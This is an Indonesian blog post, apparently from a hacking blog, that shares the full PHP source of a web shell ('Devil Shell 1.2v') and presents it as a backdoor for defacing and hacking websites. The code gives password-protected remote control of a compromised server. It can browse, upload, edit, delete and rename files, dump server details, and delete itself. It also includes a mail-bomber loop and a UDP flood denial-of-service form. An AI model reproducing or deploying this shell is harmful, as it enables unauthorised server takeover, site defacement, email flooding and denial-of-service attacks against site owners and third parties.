Ugdevilz Backdoor




hallo world...
kali ini saya mo share alat yang selalu digunakan untuk dunia hacking.. gak lain klo bukan backdoor...
alat ini selalu dibutuhkan untuk kegiatan deface atau hacking site... gak pake panjang lebar ni scriptnya.:
klo mo donlot disini :)

ni scriptnya, silakan dilihat-lihat dulu.

<?php
//========================================//
//========+++DEVIL SHELL 1.2v+++==========//
//========================================//
//====+++CODED BY UNDERGROUNDE DEVIL+++===//
//========================================//
//=====+++TEAM NUTS|| HACKNUTS.COM+++=====//
//========================================//
//====+++EMAIL ID UGDEVIL@GMAIL.COM+++====//
//========================================//
session_start();
ob_start();
error_reporting(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
?>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>?????g?s??? ????l: a? ????a? ?a¢???</title>
<head><script type=text/javascript>
function only_num(x)
{
y=x.replace(/[^\d]{1,100}/,'' );
return y;
}
</script></head>
<body text=#336666 bgcolor="#0000000" oncontextmenu="return false;">
<?php
$pstr="Q3JlZGl0IDogVW5kZXJncm91bmQgRGV2aWwgJm5ic3A7ICZuYnNwOyAmbmJzcDsgJm5ic3A7ICZuYnNwOyAmbmJzcDsgJm5ic3A7RW1haWw6IHVnZGV2aWxAZ21haWwuY29t ";
$pv=@phpversion();
$self=$_SERVER["PHP_SELF"];
$sm = @ini_get('safe_mode');

if(isset($_GET['open']))
{
chdir($_GET['open']);
$_SESSION['dir']=$_GET['open'];
}
else if(isset($_GET['create']))
{
chdir($_GET['create']);
$_SESSION['dir']=$_GET['create'];
}

 if(isset($_POST['dsub']))
{
header('location:'.$self."?open=".$_POST['ndir']);
}

function validate_email($e1,$e2,$n)
{

if( (filter_var($e1,FILTER_VALIDATE_EMAIL)) && (filter_var($e2,FILTER_VALIDATE_EMAIL)) )
{
if(is_numeric($n))
{
$error="";
return $error;
}
else
{
$error="Enter valid number of messages";

}
}
else
{$error="Enter Valid Email Id";}

return $error;

}


function sept()
{
$sepr=explode('?',$self);
echo $sepr[0];
}


if(isset($_SESSION['a'])&& !isset($_GET['edit']))
{
function dis()
{
if(!ini_get('disable_functions'))
{
echo "None";
}
else
{
echo @ini_get('disable_functions');
}
}
function logout()
{
session_destroy();
header('location:'.$self);
}
function yip()
{
echo $_SERVER["REMOTE_ADDR"];
}
function odi()
{
$od = @ini_get("open_basedir");
echo $od;
}
function sip()
{
echo getenv('SERVER_ADDR');
}
function cip()
{
echo $_SERVER["SERVER_NAME"];
}
function  safe()
{
echo($sm?"YES":"NO");
}
function browse()
{
$brow= $_SERVER["HTTP_USER_AGENT"];
print($brow);
}
function split_dir()
{
$de=explode("/",getcwd());
$del=$de[0];
for($count=0;$count<sizeof($de);$count++)
{
$imp=$imp.$de[$count].'/';

echo "<a href=".$self."?open=".$imp.">".$de[$count]."</a> / ";
}

}
function mysql_ver()
{
$output = shell_exec('mysql -V');
preg_match('@[0-9]+\.[0-9]+\.[0-9]+@', $output, $ver);
return $ver[0];
}

if(isset($_GET['delete']))
{
unlink($_GET['delete']);
$redir=$_GET['delete'];
header('location:'.$self.'?open='.$_SESSION['dir']);
}
function disk($this)
{
if($this=='2')
$ds=disk_free_space(".");
else
$ds=disk_total_space(".");

if($ds>=1073741824)
{
$ds=number_format(($ds/1073741824),2)." gb";
}
else if($ds>=1048576)
{
$ds=number_format(($ds/1048576),2)." mb";
}
else if($size >= 1024)
{
$ds=number_format(($ds/1024),2)." kb";
}
else
{
$ds=$ds." byte";
}

return $ds;
}


if($_GET['u']=='logout')
{
logout();
header('location:'.$self);
}
else if(isset($_POST['u']))
{
move_uploaded_file($_FILES['a']['tmp_name'],$_FILES['a']['name']);
move_uploaded_file($_FILES['b']['tmp_name'],$_FILES['b']['name']);
move_uploaded_file($_FILES['c']['tmp_name'],$_FILES['c']['name']);
}

$str="PHA+PHN0cm9uZz48dT5EZXZpbCBWMS4yIFBIUCBTaGVsbDwvdT48L3N0cm9uZz48L3A+DQo8cD48YnIgLz4NCkRldmlsIFYxLjIgUEhQIFNoZWxsIGlzIGEgUEhQIFNjcmlwdCwgd2hpY2ggaXMgaGFyZGx5IGRldGVjdGFibGUgYXMgbWFsaWNpb3VzIGNvZGUgY3JlYXRlZCBmb3IgY2hlY2tpbmcgdGhlIHZ1bG5lcmFiaWxpdHkgYW5kIHNlY3VyaXR5IGNoZWNrIG9mIGFueSB3ZWIgc2VydmVyIG9yIHdlYnNpdGUuIFlvdSBjYW4gY2hlY2sgeW91ciBXZWJzaXRlIGFuZCA/cmVtb3RlIHdlYiBzZXJ2ZXIgU2VjdXJpdHkuIFRoaXMgc2hlbGwgcHJvdmlkZSB5b3UgbW92ZSBpbiBzZXJ2ZXIgZGlyZWN0b3J5ICx2aWV3aW5nIGZpbGVzIHByZXNlbnQgaW4gZGlyZWN0b3J5ICx5b3UgY2FuPyBkZWxldGUgLGVkaXQgYW5kIHVwbG9hZCBwcm9maWxlcy4gTW9yZSBvdmVyIHlvdSBjYW4gY2hlY2sgOiA8c3Ryb25nPlNlcnZlciBJUCAsWW91ciBJUCwgSG9zdGVkICBQSFAgVmVyc2lvbiAsIFNlcnZlciBQb3J0LCBTYWZlIG1vZGUgOiBZZXMvTm8sIERpc2sgU3BhY2UsIGZyZWUgU3BhY2UsTWFpbCBCb21iaW5nPC9zdHJvbmc+IDxzdHJvbmc+RERvUyBBdHRhY2ssTWFpbCBCb21iaW5nLENyZWF0ZSBGaWxlIGFuZCBGb2xkZXIgZXRjPC9zdHJvbmc+PC9wPg0KPHA+PHN0cm9uZz5MaW1pdGF0aW9uczwvc3Ryb25nPjxiciAvPg0KTW9zdGx5IEZ1bmN0aW9uIGFyZSB3b3JraW5nIG9uIGxpbnV4IHNlcnZlcnMuPC9wPg0KPHA+PHN0cm9uZz5BYm91dCBDb2Rlcjwvc3Ryb25nPjo8YnIgLz4NCiAgU2NyaXB0IGlzIGNyZWF0ZWQgYnkgVW5kZXJncm91bmQgRGV2aWwgYW4gSW5kaWFuIEV0aGljYWwgaGFja2VyIFdpdGggdGhlIGhlbHAgb2YgVGVhbSBOVVRTIGFuZCBNeSBmcmllbmRzIC53aG8gZ2F2ZSBtZSBpZGVhIGFuZCBlbmNvdXJhZ2UgdG8gbWFrZSB0aGlzLkkgd291bGQgYmUgcmVhbGx5IHRoYW5rZnVsIHRvIDxzdHJvbmc+TWF5YW5rLFJhaHVsIGFuZCBBbmVlc2g8L3N0cm9uZz4gd2hvIGhlbHBlZCB0byBkZXZlbG9wLjwvcD4NCjxwPllvdSBjYW4gZG93bmxvYWQ/IHRoaXMgc2NyaXB0IGZyb20gPHN0cm9uZz50ZWFtbnV0cy5pbjwvc3Ryb25nPj8gLnRoaXMgaXMgcmVsZWFzZSB1bmRlciA8c3Ryb25nPkdOVSBHRU5FUkFMIFBVQkxJQyBMSUNFTlNFPC9zdHJvbmc+PC9wPg0KPHA+PHN0cm9uZz5EZWNsYXJhdGlvbiA8L3N0cm9uZz48YnIgLz4NClRoaXMgc2NyaXB0IG9ubHkgZm9yIGVkdWNhdGlvbiBwdXJwb3NlIC5Eb24ndCBtaXNzIHVzZSBpdCBvdGhlcndpc2UgdGhlIHNjcmlwdCBtYWtlciBpcyBub3QgcmVzcG9uc2liZSBmb3IgYW55IGNhc3VhbGl0eSBvciBkYW1hZ2UuPC9wPg0KPHA+PHN0cm9uZz5JbnN0YWxsYXRpb246PC9zdHJvbmc+PGJyIC8+DQpTaW1wbGUgaW5zdGFsbGF0aW9uIGp1c3QgcGVuZXRyYXRlIHRoZSBmaWxlIHVzaW5nIEZUUCBvciBodG1sIFVwbG9hZGVyIG9uIHNlcnZlciBhbmQgY2hlY2sgdGhlIHNpdGUgdnVsbmVyYWJpbGl0eS4gPC9wPg0KPHA+VGhpcyBpcyBwYXNzd29yZCBwcm90ZWN0ZWQgc2hlbGwgc28geW91IGNhbiBzZW5kIGVtYWlsIHRvIGdldCB1c2VybmFtZSBvciBwYXNzd29yZDxiciAvPg0KICBhdCA8c3Ryb25nPnVnZGV2aWxAZ21haWwuY29tPC9zdHJvbmc+PC9wPg0KPHA+PHN0cm9uZz5TdWdnZXN0aW9uL0J1ZyBSZXBvcnQ6PC9zdHJvbmc+PGJyIC8+DQogIE91ciB0ZWFtIGRvIHRoZSBoYXJkd29yayBmb3IgbWFraW5nIHRoaXMsYWZ0ZXJ0aGF0IGlmIHlvdSBmaW5kIGFueSBidWdzLCBkb24ndCBoZXNpdGF0ZSB0byBpbmZvcm0gbWUgYXQgdWdkZXZpbEBnbWFpbC5jb20gPC9wPg0KPHA+RG93bmxvYWQ8YnIgLz4NCiAgWW91IGNhbiBkb3dubG9hZCBzaGVsbCBhdCBoYWNrbnV0cy5jb20gYW5kIGFsc28gdmlzaXQgdGVhbW51dHMuaW4gZm9yIGxhdGVzdCB2ZXJzaW9uLm9yIHlvdSBjYW4gbWFpbCBtZSBmb3IgdGhpcyBzY3JpcHQgYXQgdWdkZXZpbEBnbWFpbC5jb208L3A+DQo=";


?>
<table width=100%>
<tr><td bgcolor="#000000"><table>
<tr width=100 height=20><td width=100  bgcolor=green></td><td rowspan=3><font color=#33CCCC face="Monotype Corsiva" size=7><?php echo base64_decode("RGV2aWwgU2hlbGw="); ?></font> <font color=#FFffff><?php echo base64_decode('VjEuMg=='); ?></font></tr>
<tr width=100 height=20 bgcolor=white><th><font color=blue><?php echo base64_decode("SU5ESUE="); ?></font></th></tr>
<tr width=100 height=20 bgcolor=orange><td></td></tr>
</table>

</td>
</tr>
<tr><td bgcolor="#000000"> <hr class=li><a href=<?php echo $self."?open="; ?>>Shell</a> | <a href=<?php echo $self."?create=".$_SESSION['dir']?>>Create File</a>  |
<a href=<?php echo $self."?moreinfo"; ?>>More Information</a>  |
<a href=<?php echo $self."?mail"; ?>>Mail Bomber</a> |
<a href=<?php echo $self."?phpinfo"; ?>>PHP Info</a> |
<a href=<?php echo $self."?dos"; ?>>DOS ATTACK</a> |
<a href=<?php echo $self;?>?warning>Declaration</a> |
<a href=<?php echo $self;?>?self>Self Kill</a> |
<a href=<?php echo $self;?>?u=logout>Logout</a></td>
</tr>
<tr><td bgcolor="#000000"> <hr  class=li><span class=hd>Server IP :</span><span class=head> <?php cip(); ?></span>
&nbsp;&nbsp;&nbsp;&nbsp;<span class=hd>Your IP :</span><span class=head> <?php yip(); ?></span>
&nbsp;&nbsp;&nbsp;&nbsp;<span class=hd>PHP Version :</span> <span class=head><?php echo $pv; ?></span>

&nbsp;&nbsp;<span class=hd>Server Port :</span> <span class=head><?php echo $_SERVER['SERVER_PORT'];?></span>
&nbsp;&nbsp;&nbsp;&nbsp;<span class=hd>Safe Mode :</span> <span class=head><?php safe();?></span>
&nbsp;&nbsp;&nbsp;&nbsp;<span class=hd>Disk Space :</span> <span class=head><?php echo disk(1);?></span>
&nbsp;&nbsp;&nbsp;&nbsp;<span class=hd>free Space :</span> <span class=head><?php echo disk(2);?></span>
<br><br>
<span class=hd>Your System info :</span> <span class=head><?php echo php_uname(); ?></span><br>
<br>
<span class=hd>View Other Directories</span> <span class=head>[<a href=<?php echo $self;?>?open=c:/>C:</a>]</span> | <span class=head>[<a href=<?php echo $self;?>?open=D:/>D:</a>]</span>
| <span class=head>[<a href=<?php echo $self;?>?open=E:/>E:</a>]</span>
<br>
<span class=hd>Directory : </span> <span class=head><?php echo split_dir();?></span>
<hr class=li>
</td></tr>
<tr><td bgcolor="#000000">
<table  width=100% class=tab>

<?php
if(isset($_GET['create']))
{
if(isset($_SESSION['a']))
{
echo "<form action=$self?edit=".$_SESSION['a']." method=post>";
}
else
{
echo "<form action=$self?edit= method=post>";

}

?>
<center>
<table>
<tr><td><span class=head>File Name </span> </td><td><input type=text name=fn size=70></td></tr>
<tr><td colspan=2><span class=head>File content</td></tr>
<tr><th colspan=2><center><textarea rows=15 cols=70 name=fc></textarea></th></tr>
<tr><th colspan=2><input type=submit value="Create File">
</th></tr></table>
</form>
<?php
}
else if(isset($_GET['warning']))
{

echo base64_decode($str);

}
else if(isset($_GET['phpinfo']))
{
echo "<center>".phpinfo();
}
else if(isset($_GET['self']))
{
unlink(__FILE__);
}
else if(isset($_GET['moreinfo']))
{
?>
<center>

<table width=90%>
<tr><th colspan=2 width=200> Brief Information </th></tr>
<tr><td class=head><b>Server Admin : </td><td><?php echo $_SERVER['SERVER_ADMIN']; ?></td></tr>
<tr><td class=head><b>Server Name : </td><td><?php cip(); ?></td></tr>
<tr><td class=head><b>Server IP : </td><td> <?php cip(); ?> </td></tr>
<tr><td class=head><b>Server PORT : </td><td><?php echo $_SERVER['SERVER_PORT'];?></td></tr>
<tr><td class=head><b>Safe Mode : </td><td><?php echo @ini_get("safe_mode")?("<b>Enable(<font color=red>Secure</font>)"):("Disable(<font color=white>Insecure</font>)"); ?></td></tr>
<tr><td class=head><b>Base Directory : </td><td><?php echo @ini_get("open_basedir")?("<b>Enable(<font color=red>Secure</font>)"):("Disable(<font color=white>Insecure</font>)"); ?></td></tr>
<tr><td class=head><b>Your IP : </td><td><?php yip(); ?></td></tr>
<tr><td class=head><b>PHP VERSION : </td><td><?php echo $pv; ?></td></tr>
<tr><td class=head><b>Curl</td><td><?php echo function_exists('curl_version')?("<b>Enable"):("Disable"); ?></td></tr>
<tr><td class=head><b>Oracle : </td><td><?php echo function_exists('ocilogon')?("<b>Enable"):("Disable"); ?></td></tr>
<tr><td class=head><b>MySQL : </td><td><?php  echo function_exists('mysql_connect')?("<b>Enable"):("Disable");?></td></tr>
<tr><td class=head><b>MSSQL :</td><td><?php echo function_exists('mssql_connect')?("<b>Enable"):("Disable"); ?></td></tr>
<tr><td class=head><b>PostgreSQL :</td><td><?php echo function_exists('pg_connect')?("<b>Enable"):("Disable"); ?></td></tr>
<tr><td class=head><b>Disable functions :</td><td><?php dis(); ?></td></tr>
<tr><td class=head><b>Total Disk Space : </td><td><?php echo disk(1);?></td></tr>
<tr><td class=head><b>Free Space : </td><td><?php echo disk(2);?></td></tr>
<tr><td class=head><b>OS</td><td><?php echo php_uname(); ?></td></tr>
<tr><td class=head><b>Server Software : </td><td><?php echo $_SERVER['SERVER_SOFTWARE']; ?></td></tr>


</table>
<?php
}
else if(isset($_GET['download']))
{
$size = filesize($_GET['download']);
$r=explode('//',$_GET['download']);
for($i=0;$i<sizeof($r);$i++)
{
$fd=$r[$i];
}

header("Content-Type: application/force-download;name=$fd");



}
else if(isset($_GET['mail']))
{

if(isset($_POST['send_email']))
{

$_POST['num']=stripslashes($_POST['num']);
$_POST['sen'] = stripslashes($_POST['sen']);
$_POST['rec'] = stripslashes($_POST['rec']);
$_POST['sub'] = stripslashes($_POST['sub']);
$_POST['msg'] = stripslashes($_POST['msg']);


$sen=$_POST['sen'];
$rec=$_POST['rec'];
$num=$_POST['num'];
$sub=$_POST['sub'];
$msg=$_POST['msg'];



if(($sen!="")&&($rec!="")&&($num!="")&&($sub!="")&&($msg!=""))
{

$error=validate_email($sen,$rec,$num);
if($error=="")
{
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/plain"."; charset=windows-1251\r\n";

$headers .= "From: ".$sen;

for($i=0;$i<$num;$i++)
{

mail($rec,$sub,$msg,$headers) or die('<b>Message Sending Failed</b>');


}


}
}
else
{
$error="Fill all the fields";

}
}
$zzz=<<<zzx
<form action= $self?mail= method="post">
<table>
<tr><td><b>Sender's Email</b></td><td><input type=text name=sen value=$sen></td></tr>
<tr><td><b>Receipent's Email</b></td><td><input type=text name=rec value=$rec></td></tr>
<tr><td><b>Number</b></td><td><input type=text name=num  onkeyup="this.value=only_num(this.value)" maxlength=7 value=$num></td></tr>
<tr><td><b>Subject</b></td><td><input type=text name=sub value=$sub></td></tr>
<tr><td><b>Message</b></td><td><textarea name=msg rows=10 cols=40 >$msg</textarea></td></tr>
<tr><td></td><td><input type=submit name=send_email value=send ></td></tr><br/>
<tr><td colspan="2"><p style=" font-size:25px"><b>$error</b></p></td></tr>
</table>
</form>
zzx;
echo $zzz;


}
else if(isset($_GET['rename']))
{
echo "<form action=# method=post>New File name <input type=text name=rf><br><input type=submit value='Rename File' name=srf></form>";
if(isset($_POST['srf']))
{
rename($_GET['rename'],$_POST['rf']);
header('location:'.$self."?open=".$_SESSION['dir']);
}
}
else if(isset($_GET['dos']))
{
if(!isset($_POST['dsub']))
{
echo "<center><form action=# method=post><table><tr><td colspan=2><h2>DOS ATACK</h2> <tr><td>Target Server IP : </td><td><input type=text name=ddos value=".$_SERVER["SERVER_NAME"]."></td></tr>
<tr><td>Server Port : </td><td><input type=text name=dpos value=".$_SERVER['SERVER_PORT']."></td></tr>
<tr><td>Time Execution : </td><td><input type=text name=dtim></td></tr>
<tr><th colspan=2><input type=Submit  name=dsub value='attack--->'></th></tr>
<tr><td colspan=2 height=100></td></tr>
</form></table>";
}
else
{

$sip=$_POST['ddos'];
$port=$_POST['dpos'];
$t=time()+$_POST['dtim'];
$send = 0;
print "DOS Atack on $ip using ".$port."PORT <br><br>";
for($i=0;$i<99999;$i++)
{
$get .= "FLOOD";
}
do
{
$send++;
}
while(time() > $max_time);

     
$fo = fsockopen("udp://$sip", $port, $errno, $errstr, 5);
if($fo)
{
                fwrite($fo, $get);
                fclose($fo);
}

echo "DOS completed @ ".date("h:i:s A")."<br> Total Data Send [" . number_format(($send*65)/1024, 0) . " MB]<br> Average Data per second [". number_format($send/$_POST['dtim'], 0) . "]";
}
}
else if($handle = opendir('./'))
 {
  while (false !== ($file = readdir($handle)))
  {
  if(is_dir($file))
     {
    $directories[] = $file;
     }
     else
     {
    $files[] = $file;
     }
  }
 asort($directories);
 asort($files);
 $kb=filesize($file)/1024;

foreach($directories as $file)
  { if($bg%2==0)
  echo "<tr bgcolor=#353535>";
  else
  echo "<tr bgcolor=#242424>";
   $kb=number_format(filesize($file)/1024,2);
 echo "
 <td valign=top><a href=".$self."?open=".realpath('.')."/".$file."><span class=li>".$file."</span> </a></td><td class=li> &nbsp;&nbsp;&nbsp;&nbsp;...<td valign=top class=li width=150>".date ("m/d/Y | H:i:s", filemtime($file))."</td>
 <th width=100><font color=white>".substr(sprintf('%o', fileperms(realpath(''))), -3)."</td>
 <td><a href=".$self."?open=".realpath('.')."/".$file."><span class=li>Open</span></a> | <a href=".$self."?delete=".realpath('.')."/".$file."><span class=li>Delete</span></a>
 </td>";
   $bg++;
  }

  foreach($files as $file)
  {
  if($bg%2==0)
  echo "<tr bgcolor=#353535>";
  else
  echo "<tr bgcolor=#242424>";
   $kb=number_format(filesize($file)/1024,2);
 echo "<form>
  <td valign=top><a href=".$self."?edit=".realpath('')."><span class=li>".$file."</span> </a></td><td class=li> &nbsp;&nbsp;&nbsp;&nbsp;".$kb."kb<td valign=top class=li>".date ("m/d/Y | H:i:s", filemtime($file))."</th>
   <th><font color=white>".substr(sprintf('%o', fileperms(realpath(''))), -3)."</td>
  <td><a href=".$self."?edit=".realpath('.')."/".$file."><span class=li>View</span></a> | <a href=".$self."?rename=".realpath('.')."/".$file."><span class=li>Rename</span></a>|<a href=".$self."?delete=".realpath('.')."/".$file."><span class=li>Delete</span></a> | <a href=".$self."?download=".realpath('.')."/".$file."><span class=li>Download</span></a> ";
   $bg++;
   }


 ?>

</table>
</td>
</tr>
<tr height=30><td bgcolor="#000000" ><table><form action=# method=post enctype=multipart/form-data><tr><td><span class=hd>Upload file 1 : </td><td><input type=file name=a size=80 class=upl></span></td></tr>
<tr><td><span class=hd >Upload file 2 : </td><td><input type=file name=b size=80 class=upl></span></td></tr>
<tr><td><span class=hd>Upload file 3 : </td><td><input type=file name=c size=80 class=upl></span>
<tr><td>
<input type=submit value=Upload name=u class=sub></td></tr></form>
<form action=<?php echo $self;?> method=post>

<tr><td>
<form action=# method=post>
<span class=hd>Change Permission  : </td><td><input type=text name=cper Value=<?php echo "'From Current Folder'"; ?> size=40>&nbsp
<select name=cc1>
<?php
for($k=1;$k<=7;$k++)
echo "<option>".$k;
?>
</select name=cc2>
<select>
<?php
for($k=1;$k<=7;$k++)
echo "<option>".$k;
?>
</select>
<select name=cc3>
<?php
for($k=1;$k<=7;$k++)
echo "<option>".$k;
?>
</select>

&nbsp;<input type=submit value=go name=dper></span>
</form>
</td></tr>
<tr><td>
<span class=hd>Go : </td><td><input type=text name=ndir Value=<?php echo realpath(''); ?> size=80>&nbsp;&nbsp;&nbsp;<input type=submit value=go name=dsub></span></td></tr>
</form>
</table>



</td>
</tr>



<?php
}

echo "<tr height=25><th bgcolor=#000000><span class=tab><font color=#336666>".base64_decode($pstr)."</span></th></tr>
</table>";
}

else if(isset($_GET['edit'])&&isset($_SESSION['a']))
{
if(isset($_POST['fn'])&& !empty($_POST['fc']))
{

if(empty($_SESSION['dir']))
{
$fo=fopen($_POST['fn'],"a");
}
else
{
$fo=fopen($_SESSION['dir']."/".$_POST['fn'],"a");
}

fwrite($fo,$_POST['fc']);
fclose($fo);
header('location:'.$self."?open=".$_SESSION['dir']);

}
else if(isset($_POST['fdata'])&&!empty($_POST['fdata']))
{
$b_dir=$_GET['edit'];
$exp=explode("/",$b_dir);
for($i=0;$i<sizeof($exp);$i++)
{
$txt=$exp[$i];
}
echo "File name is : ".$txt."<br>";
$fd=fopen($_GET['edit'],'w');
fwrite($fd,$_POST['fdata']);
fclose($fd);
header('location:'.$self."?open=".$_SESSION['dir']);
}
else
{

?>

<table width=100%><tr bgcolor=#000000><td>File Name:<?php echo $_GET['edit']; ?> [<a href=<?php echo $self; ?>>Main Page</a>]</font>
<form action=# method=post><tr bgcolor=#33CCCC><td><center>
<textarea rows=30 cols=100 name=fdata>
<?php
$fedit=$_GET['edit'];
$frd=fopen($fedit,"r");
while(!feof($frd))
{
echo htmlspecialchars(fgets($frd));


echo "$fp";
}

?>
</textarea>

<hr class=li>
<input type=submit value="&nbsp;&nbsp;&nbsp;Edit File&nbsp;&nbsp;&nbsp;" name=fdat class=lin>

<hr class=li>
</form>
</td></tr>

</td></tr>

</table>
<?php
}
}
else
{
$cuser=md5($_POST['uname']);
$puser=md5($_POST['pass']);
?>
<center><table height=400 border=0  background="abcc.jpg"  width=400 ALT="CREATED IN INDIA">
<tr><td height="141">
<p class="head">&nbsp;</p></td>
</tr>
<form action=# method=post>
<tr><th  height=100 valign=top>Username &nbsp;&nbsp;&nbsp;<Input type=text name=uname>
<br>
Password &nbsp;&nbsp;&nbsp;&nbsp;<input type=password name=pass>
<br>
<input type=submit value=submit>
</td>
</form>
</tr>
<tr><td></td>
</tr>

</table>

<?php
$user='20e0c268da73941f650bff276e39150e';
$pass='fcea920f7412b5da7be0cf42b8c93759';

if($cuser==$user && $puser==$pass)
{$_SESSION['a']=$_POST['uname'];
header('location:'.$self);}} ?>
<style>
#submit {color:#ff6600;outline:none;text-decoration:none;}
a {color:#fff;outline:none;text-decoration:none;}
a:hover{text-decoration:none;}
.head {
color: #ffffff;
font-weight: bold;
}
.tab
{
border-color:#336666;
border:double;
}
.hd
{
color:#33CCCC;
border-color:#2A2A2A;
border:double;
}
.li{
color: #33CCCC;
text-decoration:none;

}
.lin
{
background-color: #33CCCC;
text-decoration:none;

}
input
{
font-family: verdana, arial, sans-serif;
font-size: 100%;
color: #000000;
border: #000333 2px solid;
background-color: #33CCCC; //tan
border-color: brown;

}
textarea
{
font-family: verdana, arial, sans-serif;
font-size: 100%;
color: #000000;
border: #000333 2px solid;
background-color: #33CCCC; //tan
border-color: brown;

}
</style>



Responses

0 Respones to "Ugdevilz Backdoor"

Post a Comment

 

Categories

Recent Comments

Popular Posts

Copyright © 2012 | Darkcry Converted into Blogger Template by Blizbox